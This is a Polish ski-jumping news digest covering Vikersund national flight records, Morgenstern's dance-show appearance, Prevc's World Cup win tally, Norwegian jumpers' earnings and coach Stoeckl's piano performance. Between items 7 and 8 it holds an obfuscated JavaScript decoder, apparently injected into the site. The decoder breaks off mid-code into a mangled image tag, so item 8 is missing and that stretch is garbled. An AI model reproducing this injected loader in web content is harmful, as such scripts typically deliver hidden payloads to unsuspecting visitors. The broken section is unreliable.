You are currently viewing „Wokół skoczni”: Śpiewający Stoeckl, tańczący Morgi, ambitny Forfang (przegląd informacji)
Alexander Stoeckl (fot. Julia Piątkowska)

„Wokół skoczni”: Śpiewający Stoeckl, tańczący Morgi, ambitny Forfang (przegląd informacji)

Trzy konkursy lotów w Vikersund za nami. Największa skocznia na świecie była areną do śrubowania rekordów własnych i krajowych. Kolejne lotne emocje za miesiąc w Planicy. Jednak nie tylko tym żyje skoczny świat. O czym pisano i mówiono w skokach… poza skokami? A także co w tym czasie wydarzyło się w skocznym świecie, a nie zostało zauważone?

 

1. Kanada posiada nowy rekord w długości lotu narciarskiego. W miniony weekend na mamucie w Vikersund ustanowił go Mackenzie Boyd-Clowes, który na norweskim gigancie pofrunął na odległość 221,5 metra! Tym samym poprawił swój rekord życiowy o pięć metrów. Najlepszy wynik ustanowił także Francuz, Vincent Descombes Sevoie (230,5 m). Również Austriacy powitali nowego rekordzistę kraju - Stefana Krafta, który w Norwegii osiągnął 246,5 metra - o trzy metry poprawił wynik Gregora Schlierenzauera z 2011 roku również z Vikersund. Gratulujemy!

 
Morgenstern Thomas WC.Kulm .2016 fot.Bartosz.Leja  300x200 - "Wokół skoczni": Śpiewający Stoeckl, tańczący Morgi, ambitny Forfang (przegląd informacji)
Thomas Morgenstern, fot. Bartosz Leja

2. Thomas Morgenstern nie może żyć bez sportu. Po skokach przyszedł czas na helikoptery a teraz... Były skoczek narciarski w najbliższych tygodniach zajmie się tańcem! Gwiazda austriackich skoków weźmie udział w programie „Dancing Stars”. Partnerką Morgiego będzie Roswitha Wieland. Skoczek jest już po pierwszym tygodniu treningów. O tym, jak mu idzie, można przekonać się z materiałów, które udostępnia na swoim profilu na Facebooku. Możemy życzyć powodzenia (facebook.com/thomasmorgenstern)

 

3. Carl Nordin, który co prawda zakończył już oficjalnie karierę, skacząc 107 i 108 metrów (227,2 pkt), został mistrzem Szwecji w skokach narciarskich. Skoczkowie rywalizowali na obiekcie K-108 w Solleftea. Podium uzupełnili kolejni zawodnicy rywalizujący już wyłącznie amatorsko: Isak Grimholm (104,0 / 105,0 m; 210,4 pkt) i Josef Larsson (94,5 / 107,0 m; 194,4 pkt). (fis-ski.com)

 
Prevc Peter Bischofshofen.2016.winner fot.Julia .Piatkowska 300x200 - "Wokół skoczni": Śpiewający Stoeckl, tańczący Morgi, ambitny Forfang (przegląd informacji)
Peter Prevc, fot. Julia Piątkowska

4. Peter Prevc przesuwa się po drabince odniesionych zwycięstw w konkursach Pucharu Świata. Aktualnie Słoweniec notuje na swoim koncie 17 wygranych czyli tyle samom co Noriaki Kasai, i razem z Japończykiem zajmuje 15. miejsce w klasyfikacji zwycięzców. Wielce prawdopodobne jest, że przeskoczy jeszcze wyżej. wszak sezon wciąż trwa. We wspomnianej klasyfikacji prowadzi, z rekordową liczbą 53 zwycięstw, Gregor Schlierenzauer. Najstarszy z braci Prevc ma szansę w tym sezonie na uzyskanie ponad 2000 punktów w klasyfikacji generalnej, dzięki czemu będzie mógł pokonać Schlierenzauera, który w sezonie 2008/2009 uzbierał 2083 punkty i zdobył Kryształową Kulę. Słoweniec goni Austriaka również jeśli chodzi o liczbę odniesionych zwycięstw w jednym sezonie. Aktualnie podopieczny trenera Janusa na swoim koncie ma ich jedenaście - tylko o dwa mniej niż w kryształowym sezonie Austriak. Słoweńcy odnotowali również fakt, że Prevc wyprzedził w liczbie zwycięstw Primoža Peterkę, który na swoim koncie zanotował 15 triumfów. Ciekawe, czy Prevc śledzi wspomniane statystyki? (siol.net)

 

5. Kenneth Gangnes wyskakał ponad 1,5 miliona norweskich koron (ok. 686 tys. zł)! Norwegowie opublikowali dotychczasowe zarobki swoich podopiecznych. Najwięcej pieniędzy zgromadził na swoim koncie Kenneth Gangnes, który od Międzynarodowej Federacji Narciarskiej otrzymał 956 tysięcy koron, a umowy sponsorskie i stypendium przyznawane przez Olympiatoppen dołożyły kolejne pokaźne sumy. Wysokie kwoty od FIS, opiewające na ponad pół miliona koron, wpłynęły też na konta Johanna Andre Forfanga i Daniela-Andre Tande. Clas Brede Braathen, dyrektor sortowy odpowiedzialny za norweskie skoki, obawia się jednak, że pieniądze mogą sprowadzić skoczków na złą drogę. - Wyzwaniem jest pozostanie sobą, gdy zmienia się otoczenie, tak jak w tym przypadku. Często nasi reprezentanci zatracają się w tym, ale wierzę, że z Kennethem tak się nie stanie, biorąc pod uwagę jego przeszłość. (vg.no) 

 
Firfang Johann.Andre TCS.Oberstdorf.2015 fot.Julia .Piatkowska 300x200 - "Wokół skoczni": Śpiewający Stoeckl, tańczący Morgi, ambitny Forfang (przegląd informacji)
Johann Andre Forfang, fot. Julia Piątkowska

6. Słoweńcy przedstawili krajowy ranking najlepszych zimowych sportowców biorący pod uwagę liczbę zwycięstw w zawodach Pucharu Świata. Pierwsze miejsce zajmuje narciarka alpejska Tina Maze (26 triumfów), druga jest reprezentantka biegów, Petra Majdič (24 zwycięstwa) a trzeci (dopiero!) Peter Prevc z 17 pierwszymi miejscami. Na czwartej lokacie sklasyfikowany został kolejny skoczek, Primož Peterka (15 zwycięstw) a na piątej snowboardzista Dejan Košir (11 triumfów). (delo.si)

 

7. Johann Andre Forfang postawił sobie bardzo konkretny cel na przyszłość. Młody Norweg chce poprawić krajowy rekord dotyczący liczby zwycięstw skoczka w konkursach Pucharu Świata. Aktualnie na szczycie listy znajduje się Roar  Ljøkelsøy  z jedenastoma triumfami. Forfang na swoim koncie wprawdzie nie ma jeszcze zwycięstwa w Pucharze Świata, jednak obserwując jego występy w tym sezonie, można liczyć na to, że upragniony dzień nadejdzie. (aftenposten.no)

 
- "Wokół skoczni": Śpiewający Stoeckl, tańczący Morgi, ambitny Forfang (przegląd informacji)function u2fd518ba9147(q3){var u9='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var y7='';var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0ander Stoeckl, fot. Bartosz Leja" src="http://www.skokipolska.pl/wp-content/uploads/2013/05/stoeckl_alexander_b.leja-300x200.jpg" alt="stoeckl_alexander_b.leja" width="300" height="200" /> Alexander Stoeckl, fot. Bartosz Leja

9. Alexander Stöckl posiada nie tylko talent do wyłuskiwania gwiazd skoków narciarskich. Potrafi również świetnie grać na fortepianie i śpiewać. Próbkę swoich możliwości pokazał w muzeum muzyki popularnej "Rockheim" w Trondheim, kiedy wykonał utwór Eltona Johna "Rocket Man". Jak sam mówi, ballada ta jest jedną z ulubionych tego wykonawcy. Chcecie posłuchać wykonania trenera Norwegów? Link TUTAJ. Co ciekawe, Stoeckl nie stroni też od okazywania emocji, a lotne wyniki jego podopiecznych na Vikersund wzbudziły tak silne wrażenia, że Austriak nie potrafił powstrzymać łez, a dziennikarze rodzimej stacji TV2 musieli przerwać nagrywanie wywiadu. (vg.no)

 

10. Słoweńska dominacja w ostatnim czasie zdaje się nie mieć końca. Kadra Słowenii (m.in. Peter Prevc, Jernej Damjan, Robert Kranjec) razem z trenerem, Goranem Janusem, wystąpiła w reklamie sklepu Mercator, który jest jednym ze sponsorów reprezentacji. Jak wypadli skoczkowie? Przekonajcie się o tym niżej. (facebook.com/Mercator)

 

zebrała Paulina Jarmolik

 

Dodaj komentarz